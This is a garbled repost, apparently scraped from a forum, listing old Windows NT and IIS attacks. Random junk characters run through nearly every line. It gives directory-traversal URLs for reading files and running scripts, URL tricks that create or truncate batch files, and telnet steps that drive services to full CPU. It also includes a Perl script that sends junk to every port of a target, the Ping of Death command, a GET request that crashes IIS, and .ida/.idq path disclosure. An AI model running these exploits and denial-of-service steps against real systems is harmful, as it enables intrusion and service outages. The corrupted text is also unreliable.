受影響系統(tǒng):4.0,iis 1.0/ o$ S1 y* [* G" T1 I" @# ^9 }
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
) S1 R- p! C# y$ \$ k( H
/ o' {* `" @8 @ C7 OA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
& V! ^$ Y& ~4 |! V9 A7 }9 @
5 H8 \/ l4 ?' I7 W& {; x8 p: ABy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.. D8 Z ?! e4 o1 P0 v E! R
8 d! K7 Y; @2 v8 U--------------------------------------------------------------------
* s; ? b n$ U x$ P- q W. [" e! a% p0 ~
受影響系統(tǒng):4.0
- h$ X& N7 u, J/ r6 C. h& gA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
6 v+ }- s# n' J. }3 A/ X+ m7 s- e% H8 Y! Y
If the file 'target.bat' exists, the file will be truncated.
; D" k0 }, l i) a% \
) q+ {8 I# k& l
* J! D& x8 N; N- c3 b( ?A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.) c( W* u* V# r+ n+ w
) c3 B$ l% X( h/ {
----------------------------------------------------------------------
2 w, z2 U: m5 T# O) B1 s, ]
+ b C t0 u+ `受影響系統(tǒng):3.51,4.0
9 O6 F8 r# g2 T! l0 j9 \Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
: Q4 B/ Z+ ~3 m2 N/ y( ?# n5 H; j4 _5 Q4 D7 ?- i* ?
The following steps;
1 Q9 R1 t5 Y3 A. y# m
( Y* F+ y, f7 s/ eTelnet to an NT 4.0 system on port 135
# Q3 s- ]5 V$ o9 U3 N! ]Type about 10 characters followed by a <CR>
! z: D8 K* k' X' A' C BExit Telnet
! m9 K6 l6 [0 {& c; h" mresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
- D' c/ n1 s# z* j( a
h; \6 U9 E9 x9 yWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.) v& f" @( g+ Y: T5 c4 ]
% _( n; x1 k. s3 C( C1 ]" o
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.$ j6 x. B y8 ^% F; @. \
2 P1 F( Q0 z) H4 P2 f4 |4 ~
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
. v4 ?$ f6 Q' k7 S5 l, {! s! n5 P, R, A/ q8 V
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):) f* t1 q3 Q7 {+ |; H, ?8 V
1 R8 ^) O' A8 U4 _7 F" \
/*begin poke code*/ [8 V/ `9 R$ C
6 A4 R8 T& l- O
use Socket;
! p5 W' N! o- q9 a# J h6 ause FileHandle;
9 u% v2 S4 Y. r- `; o# K' h* F5 S7 erequire "chat2.pl";; }0 G6 X9 M- E/ G' F: s, M
# i2 o4 u/ p/ u: M" c8 x/ S5 B" G
$systemname = $ARGV[0] && shift;0 n7 |6 |6 L6 F; j
: e1 E6 h- z& @( R) s
$verbose = 1; # tell me what you're hitting2 f x. I8 ? Y2 c! S7 s
$knownports = 1; # don't hit known problem ports K! j: @9 z j, i; p9 y9 s' s
for ($port = $0; $port<65535; $port++)
. w% q9 Y4 Q& S) `% V/ U{6 B6 M/ u/ `3 q8 _
9 _4 B9 w' m- A Q# L( j( d$ ?8 I7 K1 f7 W1 @* P8 T, g
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
@5 I( }0 ?) v8 D* H+ d* ?4 G' @3 vnext;
/ C# J5 o( ?! _" c$ T$ |0 p}
* V; c" d# M) O- S" y0 |$fh = chat::open_port($systemname, $port);
4 l- e* M0 k; y1 T5 @' Ochat::print ($fh,"This is about ten characters or more");
3 a7 B9 K: e3 E- Bif ($verbose) {
9 o2 j0 _* S. s8 L) n3 H3 G' b5 hprint "Trying port: $port\n";
1 n. k' E1 v0 E0 ^8 Y" m}
0 k1 P# F/ k( H+ w9 _! w3 o$ pchat::close($fh);
3 m' i" p$ ?8 ^! G2 J. m. n Q' o5 P! s+ H
} n/ [+ t$ r( n( l: k( s# W0 p
8 u4 |& L% n! y- o- ]/ D6 \% L8 D
& B9 \- X' u, r" K+ F/ v4 r) ?/*end poke code*/
' J6 \4 y. t6 _( Q3 \* J
+ H. \9 u- O/ s0 U% V, h7 @Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
( \2 }! y# `' }* ~0 o8 p: m+ k
--------------------------------------------------------------------------------0 M5 y; z: e$ q4 X
( e0 J, W3 [6 ?# Y2 o
受影響系統(tǒng):4.0
% E0 Q. B, \5 b7 hUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.$ X" J+ |+ B4 t( }
2 Z- G6 J3 t$ O4 z: Y% XThis attack causes Dr. Watson to display an alert window and to log an error: " f* m, s" ]- c) d' L; K
9 |& M' r" T8 d, I
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
5 T; q7 ?9 S* ^: h9 ?
6 v- m; i7 P. e/ F& ?5 H1 B--------------------------------------------------------------------------------
4 G/ R, m J Z. v
! j4 x" k' \7 ~# U8 X受影響系統(tǒng):3.51,4.0* B) Q8 |; g# U4 T: J% ]
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:9 i3 X8 [( Y7 H+ E& f
6 m- h# {# O& N. TSTOP: 0X0000001E% _: _0 f, V6 U7 y
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS" k; G" E8 s' I& v8 ^+ a
?: @: r0 l! c& p) h4 F8 l u- p
-OR-
" M# U# k8 @+ |2 ^: C
: m4 k3 l& M& q& r* ^, U' tSTOP: 0x0000000A" G4 w( m0 z; X1 r2 n9 a
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS- T: O8 ^ d, U. o2 L" H
) {& |( B: X- l# oNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
[1 U# E4 P0 d5 }$ _- a8 s5 y6 K* e
, C/ Q9 h, t3 g4 U9 H1 \--------------------------------------------------------------------------------
- I, C' X# [; N6 l" d& ~6 D% E% a3 `* J1 A) `: z! [5 G' c
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
, Q7 f1 [# w7 Z% H9 I
6 O* I0 K: q7 }3 R3 d; d2 i--------------------------------------------------------
% y1 E* |+ E5 Y/ f9 ?! {- P# K1 X. _% r$ q7 B7 m1 R
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |